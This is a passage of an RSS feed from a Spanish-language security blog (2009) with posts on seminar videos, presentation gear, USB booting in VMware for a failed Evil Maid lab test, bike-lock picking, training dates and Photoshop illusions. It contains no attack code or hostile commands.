style="font-size:130%;"&gt;&lt;a style="font-weight: bold;" href="http://www.youtube.com/watch?v=Ck9yzGPRsU8"&gt;La Web desde el ojo de un atacante&lt;/a&gt;&lt;/span&gt; (Nahuel Grisolia)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Videos de los SEMINARIOS:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;- &lt;span style="font-size:130%;"&gt;&lt;a style="font-weight: bold;" href="http://www.youtube.com/watch?v=C7NGbT24Xpc"&gt;Apertura de las Jornadas&lt;/a&gt;&lt;/span&gt; (Juan Manuel Abal Medina - Eduardo Thill)&lt;br /&gt;&lt;br /&gt;- &lt;span style="font-size:130%;"&gt;&lt;a style="font-weight: bold;" href="http://www.youtube.com/watch?v=jy7X1o-uCio"&gt;La respuesta internacional a los incidentes de seguridad&lt;/a&gt;&lt;/span&gt; (Eduardo Carozo - Gaston Franco)&lt;br /&gt;&lt;br /&gt;- &lt;span style="font-size:130%;"&gt;&lt;a style="font-weight: bold;" href="http://www.youtube.com/watch?v=r0d2FCDBtVc"&gt;La visión Jurídica: necesidad de marco normativo&lt;/a&gt;&lt;/span&gt; (Lisandro Teskiewicz - Pablo Pallazi - Ricardo Saenz - Gustavo Presman)&lt;br /&gt;&lt;br /&gt;- &lt;span style="font-size:130%;"&gt;&lt;a style="font-weight: bold;" href="http://www.youtube.com/watch?v=qVAhMxwJFEE"&gt;La seguridad cibernética en el gobierno de Brasil&lt;/a&gt;&lt;/span&gt; (Raphael Mandarino Jr.)&lt;br /&gt;&lt;br /&gt;- &lt;span style="font-size:130%;"&gt;&lt;a style="font-weight: bold;" href="http://www.youtube.com/watch?v=oseOjHMsVFI"&gt;La visión del Sector Privado: necesidad de articulación&lt;/a&gt;&lt;/span&gt; (Julio Ardita - Horacio Barrozo - Pablo Silberfich)&lt;br /&gt;&lt;br /&gt;- &lt;span style="font-size:130%;"&gt;&lt;a style="font-weight: bold;" href="http://www.youtube.com/watch?v=UdmiwC88OJg"&gt;Protección de infraestructura criticas de España&lt;/a&gt;&lt;/span&gt; (Fernando Jose Sanchez Gomez - Tomas Martin Iñurrieta)&lt;br /&gt;&lt;br /&gt;- &lt;span style="font-size:130%;"&gt;&lt;a style="font-weight: bold;" href="http://www.youtube.com/watch?v=FSCq0xhqHco"&gt;ArCERT: 10 años de experiencia - Pasado y futuro&lt;/a&gt;&lt;/span&gt; (Pedro Janices - Patricia Prandini)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-46492888085510989?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/9SBjzrRKPT8" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/9SBjzrRKPT8/publicados-los-videos-del-seminario-de.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_8alnjaETaog/SucoX4Hz5uI/AAAAAAAADWI/jKmIgDmoP3s/s72-c/side_column_image.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">7</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/10/publicados-los-videos-del-seminario-de.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-389078126390173666</guid><pubDate>Mon, 26 Oct 2009 15:08:00 +0000</pubDate><atom:updated>2009-11-09T19:57:03.648-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Bizarro</category><title>Concientización de Usuarios</title><description>&lt;div style="text-align: justify;"&gt;Los que trabajamos en seguridad siempre nos encontramos con dificultades a la hora de concientizar a los usuarios sobre los riesgos, tal vez deberíamos aprender sobre las campañas de concientización que se hacen en los viejos ascensores de Buenos Aires :-?&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_8alnjaETaog/SuW7l1g29-I/AAAAAAAADWA/rhrv9F0U50s/s1600-h/Ascensores_BA.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 393px; height: 400px;" src="http://1.bp.blogspot.com/_8alnjaETaog/SuW7l1g29-I/AAAAAAAADWA/rhrv9F0U50s/s400/Ascensores_BA.JPG" alt="" id="BLOGGER_PHOTO_ID_5396925987167860706" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-389078126390173666?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/OVHm7QX0mO8" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/OVHm7QX0mO8/concientizacion-de-usuarios.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_8alnjaETaog/SuW7l1g29-I/AAAAAAAADWA/rhrv9F0U50s/s72-c/Ascensores_BA.JPG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/10/concientizacion-de-usuarios.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-1957193063304645439</guid><pubDate>Fri, 23 Oct 2009 19:45:00 +0000</pubDate><atom:updated>2009-10-23T16:59:02.769-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Presentation</category><title>Kit del Presentador</title><description>&lt;div style="text-align: justify;"&gt;Como no todo pasa por el &lt;a href="http://www.presentationzen.com/"&gt;Presentation Zen&lt;/a&gt;, aquí les dejo algunas recomendaciones sobre hardware que me ha resultado muy bueno al momento de dar trainings y presentaciones.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;Control Remoto y Puntero Laser&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;El siguiente es el &lt;a style="font-weight: bold;" href="http://www.amazon.com/Logitech-2-4-Cordless-Presenter-Black/dp/B0007KVK8E"&gt;Logitech 2.4 GHz Cordless Presenter&lt;/a&gt;, realmente una joya!! lo que mas me gusta es que es sencillo, básico y muy profesional:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_8alnjaETaog/SuIJLxk6L6I/AAAAAAAADV4/-3yz4oHVw_Y/s1600-h/presenter_logitech.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 300px; height: 292px;" src="http://2.bp.blogspot.com/_8alnjaETaog/SuIJLxk6L6I/AAAAAAAADV4/-3yz4oHVw_Y/s400/presenter_logitech.jpg" alt="" id="BLOGGER_PHOTO_ID_5395885401434632098" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Diseñado para Windows/PowerPoint pero con Mac/Keynote tambien funciona sin ningun problema.&lt;br /&gt;&lt;br /&gt;Posee incorporado un puntero laser muy poderoso, permite controlar el volumen de nuestra laptop,  salir de la presentación, poner la pantalla en negro(solo en Windows) y tiene un timer para que podamos controlar el tiempo. &lt;span style="font-weight: bold;"&gt;Altamente recomendable.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;Proyector de Video&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Esto debe ser a lo que menos importancia le damos durante una presentación, y en charlas técnicas donde hacemos demos en vivo juegan un papel muy importante.&lt;br /&gt;&lt;br /&gt;Para mi la clave del proyector se encuentra en la resolución que puede manejar, mas aun cuando al crear los slides de nuestra charla podemos elegir con que resolución hacerlos, imaginense armar los slides de 1280 x 720 y que el proyector solo maneje 800 x 600.&lt;br /&gt;&lt;br /&gt;Peor aun es si nuestra laptop tiene una pantalla "wide" de 1280 x 800 y hacemos demos en vivo con varias máquinas virtuales. Me paso que el proyector solo soportaba 800 x 600 y las pantallas de las VM's quedaron demasiado grandes.&lt;br /&gt;&lt;br /&gt;El siguiente es un proyector &lt;a style="font-weight: bold;" href="http://www1.la.dell.com/ar/es/domesticos/Perif%C3%A9ricos-Dell/projector_dell_1609wx/pd.aspx?refid=projector_dell_1609wx&amp;amp;s=dhs&amp;amp;cs=ardhs1"&gt;Dell 1609WX&lt;/a&gt;, soporta 1280 x 800 por lo que podemos proyectar en formato wide sin problemas:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_8alnjaETaog/SuII6MAmV1I/AAAAAAAADVw/Lo9bSrHfh0o/s1600-h/proj_1609wx_overview1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 366px; height: 350px;" src="http://3.bp.blogspot.com/_8alnjaETaog/SuII6MAmV1I/AAAAAAAADVw/Lo9bSrHfh0o/s400/proj_1609wx_overview1.jpg" alt="" id="BLOGGER_PHOTO_ID_5395885099292448594" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Soporta 2500 lumenes, lo que también es un factor importante si estamos proyectando desde lejos o en lugares luminosos.&lt;br /&gt;&lt;br /&gt;Lo que todavía no pude probar son esos lapices que te permiten escribir en la pantalla, igualito a lo que hacia Alfredo Ortega en la ekoparty ;-) Mas recomendaciones son bienvenidas!&lt;br /&gt;&lt;br /&gt;Posts relacionados:&lt;br /&gt;- &lt;a href="http://kungfoosion.blogspot.com/2008/06/cmo-mejorar-nuestras-presentaciones.html"&gt;Cómo Mejorar Nuestras Presentaciones&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://kungfoosion.blogspot.com/2008/07/claves-para-una-presentacin-inolvidable.html"&gt;Claves Para una Presentación Inolvidable&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-1957193063304645439?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/BYReqAZ3NmA" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/BYReqAZ3NmA/kit-del-presentador.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_8alnjaETaog/SuIJLxk6L6I/AAAAAAAADV4/-3yz4oHVw_Y/s72-c/presenter_logitech.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/10/kit-del-presentador.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-5662110153842082920</guid><pubDate>Wed, 21 Oct 2009 23:56:00 +0000</pubDate><atom:updated>2009-11-09T20:08:26.736-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">VMWare</category><title>USB Booting con VMWare</title><description>&lt;div style="text-align: justify;"&gt;Estuve probando el ataque &lt;span style="font-style: italic;"&gt;"Evil Maid"&lt;/span&gt; en una máquina virtual y me encontré con que la BIOS de VMWare no soporta el booteo desde USB... increíble!&lt;br /&gt;&lt;br /&gt;Evil Maid es un ataque contra sistemas que tienen cifrado completo de disco como TrueCrypt, y la idea consiste en conectar un pendrive USB con una imagen booteable de Linux que instalaría un &lt;span style="font-style: italic;"&gt;"sniffer"&lt;/span&gt;. Luego cuando el usuario ingrese su contraseña de TrueCrypt, esta quedaría guardada en alguna parte del disco, y el atacante la podría obtener volviendo a bootear la laptop desde el pendrive USB.&lt;br /&gt;&lt;br /&gt;Al parecer el hardware virtual de VMWare esta basado en una motherboard para Pentium 2 y en aquella época las BIOS no permitían bootear desde USB. Intente que VMWare directamente bootee la imagen del pendrive pero no funciono, asi que encontré el siguiente workaround por si alguien necesita bootear desde USB.&lt;br /&gt;&lt;br /&gt;Antes que nada, el booteo de VMWare es tan rápido que no da tiempo a intentar ingresar a la BIOS, pero agregando la siguiente linea en el archivo &lt;span style="font-style: italic;"&gt;".vmx"&lt;/span&gt; podremos forzar el ingreso durante un booteo:&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span class="codigo"&gt;bios.forceSetupOnce = "TRUE"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Para bootear con USB, primero vamos a decirle a VMWare que bootee una imagen de un Boot Manager llamado &lt;a style="font-weight: bold;" href="http://www.plop.at/en/bootmanager.html"&gt;PLoP&lt;/a&gt;:&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_8alnjaETaog/St-gZx77ThI/AAAAAAAADVo/V4OyxqPtrp0/s1600-h/vmware.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 263px;" src="http://4.bp.blogspot.com/_8alnjaETaog/St-gZx77ThI/AAAAAAAADVo/V4OyxqPtrp0/s400/vmware.png" alt="" id="BLOGGER_PHOTO_ID_5395207243375005202" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Una vez que PLoP se ha cargado, entre otras opciones nos permitiría bootear desde USB:&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_8alnjaETaog/St-gQ9Gf8yI/AAAAAAAADVg/D5LpHCs3Z_w/s1600-h/plop.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 363px;" src="http://4.bp.blogspot.com/_8alnjaETaog/St-gQ9Gf8yI/AAAAAAAADVg/D5LpHCs3Z_w/s400/plop.png" alt="" id="BLOGGER_PHOTO_ID_5395207091753317154" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Cuando elegimos bootear desde USB, finalmente se cargara el Linux que esta en el pendrive y podremos realizar el ataque &lt;span style="font-style: italic;"&gt;"Evil Maid"&lt;/span&gt; en VMWare:&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_8alnjaETaog/St-gIwtEfQI/AAAAAAAADVY/Me_5iOoaLec/s1600-h/evilmaid.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 278px;" src="http://1.bp.blogspot.com/_8alnjaETaog/St-gIwtEfQI/AAAAAAAADVY/Me_5iOoaLec/s400/evilmaid.png" alt="" id="BLOGGER_PHOTO_ID_5395206950986480898" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Igualmente el ataque nunca me funciono, Evil Maid no detecta el Boot Loader de TrueCrypt, pero estoy seguro que es algún problema de VMWare porque cuando hago el cifrado de todo el disco (lo hice 2 veces pfffff..) me aparecen algunos errores de integridad en el disco.&lt;br /&gt;&lt;br /&gt;Después de dedicarle algunas horas a esto me aburri pero me gusto lo del USB Booting, todo esto lo probe con VMWare Fusion en Mac OS X Leopard.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;- &lt;a style="font-weight: bold;" href="http://theinvisiblethings.blogspot.com/2009/10/evil-maid-goes-after-truecrypt.html"&gt;Evil Maid goes after TrueCrypt!&lt;/a&gt;&lt;br /&gt;- &lt;a style="font-weight: bold;" href="http://www.plop.at/en/bootmanager.html"&gt;PLoP Boot Manager&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-5662110153842082920?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/QmKPIPPA70g" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/QmKPIPPA70g/usb-booting-con-vmware.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_8alnjaETaog/St-gZx77ThI/AAAAAAAADVo/V4OyxqPtrp0/s72-c/vmware.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/10/usb-booting-con-vmware.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-9006199003594126802</guid><pubDate>Mon, 19 Oct 2009 19:29:00 +0000</pubDate><atom:updated>2009-10-28T14:52:45.754-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">LockPicking</category><title>YETI Total Security</title><description>&lt;div style="text-align: justify;"&gt;YETI Total Security, seguridad total para su empresa, presenta sus nuevos dispositivos de &lt;span style="font-style: italic;"&gt;Bycicle Endpoint Protection&lt;/span&gt;:&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;object width="320" height="266" class="BLOG_video_class" id="BLOG_video-2985ea9fb9788ee7" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"&gt;&lt;param name="movie" value="http://www.blogger.com/img/videoplayer.swf?videoUrl=http%3A%2F%2Fvp.video.google.com%2Fvideodownload%3Fversion%3D0%26secureurl%3DqAAAAO3T1daHheEeH3ZcEQIwEb-NpXiDu71RiyEeiMNUkbVuz_6V9YTmg-DeVm8Q7QQA9gwTaxE2FX43LHEUCt-udVqXDeDr5MCELX3KWyeR7K8Whs3gW1L17E5VSs0WMV089fzGC7WzMFCkY2qL8KIrk56pgEXQrIB6oDSWoqqMk62lHsv9O5SLP6oSVdGONxi06Fq4QmLPBowZlBNI6oARkUbwgx94vu8u8qzcaXQsDc4K%26sigh%3DLrKTMivbj180GZaGMbPuMUf6I1c%26begin%3D0%26len%3D86400000%26docid%3D0&amp;amp;nogvlm=1&amp;amp;thumbnailUrl=http%3A%2F%2Fvideo.google.com%2FThumbnailServer2%3Fapp%3Dblogger%26contentid%3D2985ea9fb9788ee7%26offsetms%3D5000%26itag%3Dw320%26sigh%3DooVv65Th1vmjJOEHaLWP4QoGHpk&amp;amp;messagesUrl=video.google.com%2FFlashUiStrings.xlb%3Fframe%3Dflashstrings%26hl%3Den"&gt;
&lt;param name="bgcolor" value="#FFFFFF"&gt;
&lt;embed width="320" height="266" src="http://www.blogger.com/img/videoplayer.swf?videoUrl=http%3A%2F%2Fvp.video.google.com%2Fvideodownload%3Fversion%3D0%26secureurl%3DqAAAAO3T1daHheEeH3ZcEQIwEb-NpXiDu71RiyEeiMNUkbVuz_6V9YTmg-DeVm8Q7QQA9gwTaxE2FX43LHEUCt-udVqXDeDr5MCELX3KWyeR7K8Whs3gW1L17E5VSs0WMV089fzGC7WzMFCkY2qL8KIrk56pgEXQrIB6oDSWoqqMk62lHsv9O5SLP6oSVdGONxi06Fq4QmLPBowZlBNI6oARkUbwgx94vu8u8qzcaXQsDc4K%26sigh%3DLrKTMivbj180GZaGMbPuMUf6I1c%26begin%3D0%26len%3D86400000%26docid%3D0&amp;amp;nogvlm=1&amp;amp;thumbnailUrl=http%3A%2F%2Fvideo.google.com%2FThumbnailServer2%3Fapp%3Dblogger%26contentid%3D2985ea9fb9788ee7%26offsetms%3D5000%26itag%3Dw320%26sigh%3DooVv65Th1vmjJOEHaLWP4QoGHpk&amp;amp;messagesUrl=video.google.com%2FFlashUiStrings.xlb%3Fframe%3Dflashstrings%26hl%3Den" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;
&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Solamente jugando con mi kit del &lt;a href="http://kungfoosion.blogspot.com/2009/10/lockpicking-club.html"&gt;Club de Lockpicking&lt;/a&gt; y un candado marca YETI de la bicicleta de mi cuñada... ;-)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-9006199003594126802?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/bFbn6oiFQ64" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/bFbn6oiFQ64/yeti-total-security.html</link><author>noreply@blogger.com (KungFooSion)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/10/yeti-total-security.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-2779914886954407862</guid><pubDate>Sun, 18 Oct 2009 23:40:00 +0000</pubDate><atom:updated>2009-10-28T14:53:01.584-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Trainings</category><title>COMBAT Trainings en Rosario y Cordoba</title><description>&lt;div style="text-align: justify;"&gt;Durante noviembre vamos a tener una maraton de &lt;span style="font-weight: bold;"&gt;COMBAT Trainings&lt;/span&gt; que van a incluir las ciudades de Rosario y Cordoba. &lt;span style="font-style: italic;"&gt;Stay Tunned!&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_8alnjaETaog/Stun5mTaNeI/AAAAAAAADUo/VjJUcd5rVTM/s1600-h/bruce_lee2.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 344px; height: 344px;" src="http://2.bp.blogspot.com/_8alnjaETaog/Stun5mTaNeI/AAAAAAAADUo/VjJUcd5rVTM/s400/bruce_lee2.jpg" alt="" id="BLOGGER_PHOTO_ID_5394089586682639842" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Actualmente estamos dictando el &lt;span style="font-weight: bold;"&gt;COMBAT Training &lt;/span&gt;&lt;span style="font-style: italic; font-weight: bold;"&gt;-extended edition-&lt;/span&gt;, que es el clásico training intensivo de 5 dias pero dictado en un 1 dia por semana durante 5 semanas. En este momento vamos por la segunda semana, asi que los interesados en esta modalidad deberán esperar hasta el próximo año.&lt;br /&gt;&lt;br /&gt;Mientras tanto, este es el calendario de trainings para Noviembre:&lt;br /&gt;&lt;br /&gt;- &lt;span style="font-weight: bold;font-size:130%;" &gt;C&lt;/span&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;ó&lt;/span&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;rdoba Capital&lt;/span&gt; (16 al 20 de Noviembre)&lt;br /&gt;&lt;br /&gt;- &lt;span style="font-weight: bold;font-size:130%;" &gt;Ciudad de Buenos Aires&lt;/span&gt; (23 al 27 de Noviembre)&lt;br /&gt;&lt;br /&gt;- &lt;span style="font-weight: bold;font-size:130%;" &gt;Rosario&lt;/span&gt; (30 de Noviembre al 04 de Diciembre)&lt;br /&gt;&lt;br /&gt;También estamos planificando trainings en Mendoza, Tierra del Fuego y el sur de Chile, si estan interesados pueden contactarse con &lt;span style="font-weight: bold;"&gt;Sol Argento&lt;/span&gt; a &lt;span style="font-weight: bold;"&gt;capacitacion@base4sec.com&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Mas info sobre los trainings &lt;a style="font-weight: bold;" href="http://kungfoosion.blogspot.com/search/label/Trainings"&gt;aqui&lt;/a&gt; o en la web de &lt;a style="font-weight: bold;" href="http://www.base4sec.com/"&gt;base4&lt;/a&gt;.&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-2779914886954407862?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/qZd2oVwxPhg" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/qZd2oVwxPhg/combat-trainings-en-rosario-y-cordoba.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_8alnjaETaog/Stun5mTaNeI/AAAAAAAADUo/VjJUcd5rVTM/s72-c/bruce_lee2.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/10/combat-trainings-en-rosario-y-cordoba.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-5633140405217100785</guid><pubDate>Tue, 13 Oct 2009 18:11:00 +0000</pubDate><atom:updated>2009-11-09T20:00:27.590-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Photoshop</category><title>El Maravilloso Mundo del Photoshop II</title><description>&lt;div style="text-align: justify;"&gt;Un estudio logro demostrar como el contraste de una imagen es un factor importante para la percepción del genero sexual de una cara.&lt;br /&gt;&lt;br /&gt;A continuación, pueden ver a la izquierda la imagen de una mujer y a la derecha la de un hombre, &lt;span style="font-weight: bold; font-style: italic;"&gt;¿o no?&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_8alnjaETaog/StTEBN20HTI/AAAAAAAADUA/9CdwWFIQkSg/s1600-h/illusionofsex.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 204px;" src="http://3.bp.blogspot.com/_8alnjaETaog/StTEBN20HTI/AAAAAAAADUA/9CdwWFIQkSg/s400/illusionofsex.gif" alt="" id="BLOGGER_PHOTO_ID_5392150179047808306" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Este fue el ganador del &lt;a href="http://illusioncontest.neuralcorrelate.com/2009/the-illusion-of-sex/"&gt;tercer lugar de un concurso&lt;/a&gt; de efectos visuales, en donde a una misma cara &lt;span style="font-style: italic;"&gt;"androgina"&lt;/span&gt;, cuando se le aplica mayor contraste se crea la ilusion del sexo femenino y con menor contraste la del sexo masculino.&lt;br /&gt;&lt;br /&gt;Me pregunto si este tipo de técnicas se esta utilizando para realizar reconocimientos automáticos faciales en imágenes.&lt;br /&gt;&lt;br /&gt;Hablando de efectos visuales, no queria dejar de mencionar el desastre de photoshop de Ralph Lauren de la semana pasada, en donde retocaron el cuerpo de una modelo a formas realmente imposibles para un ser humano.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_8alnjaETaog/StTDkGQEhkI/AAAAAAAADT4/09uBgoHDogI/s1600-h/lauren.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 229px; height: 400px;" src="http://3.bp.blogspot.com/_8alnjaETaog/StTDkGQEhkI/AAAAAAAADT4/09uBgoHDogI/s400/lauren.jpg" alt="" id="BLOGGER_PHOTO_ID_5392149678790051394" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Luego de que varios medios hablaran sobre esto, Ralph Lauren intento censurar a los mismos mediante &lt;a href="http://craphound.com/10-2-09LettertoPriorityColoinrePRLInfringement.pdf"&gt;DMCA takedown notices&lt;/a&gt;, y a partir de allí el desastre se transformo en catástrofe cuando todo el mundo comenzó a hablar sobre ello, lo que se conoce como el &lt;a href="http://en.wikipedia.org/wiki/Streisand_effect"&gt;Streisand Effect&lt;/a&gt;.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;- &lt;span style="font-weight: bold;font-size:130%;" &gt;&lt;a href="http://kungfoosion.blogspot.com/2009/05/el-maravilloso-mundo-del-photoshop.html"&gt;El Maravilloso Mundo del Photoshop I&lt;/a&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-5633140405217100785?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/l_9kAAMyd6s" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/l_9kAAMyd6s/el-maravilloso-mundo-del-photoshop-ii.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_8alnjaETaog/StTEBN20HTI/AAAAAAAADUA/9CdwWFIQkSg/s72-c/illusionofsex.gif" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/10/el-maravilloso-mundo-del-photoshop-ii.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-2712842537815532373</guid><pubDate>Tue, 13 Oct 2009 02:58:00 +0000</pubDate><atom:updated>2009-11-09T19:57:03.649-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Bizarro</category><title>El Arte de la Elegancia</title><description>&lt;div style="text-align: justify;"&gt;Recien vuelvo del recital de Los Fabulosos Cadillacs donde presentaban su nuevo disco &lt;span style="font-style: 